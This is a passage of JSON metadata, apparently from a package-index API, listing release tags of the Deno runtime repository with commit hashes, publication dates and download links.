repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.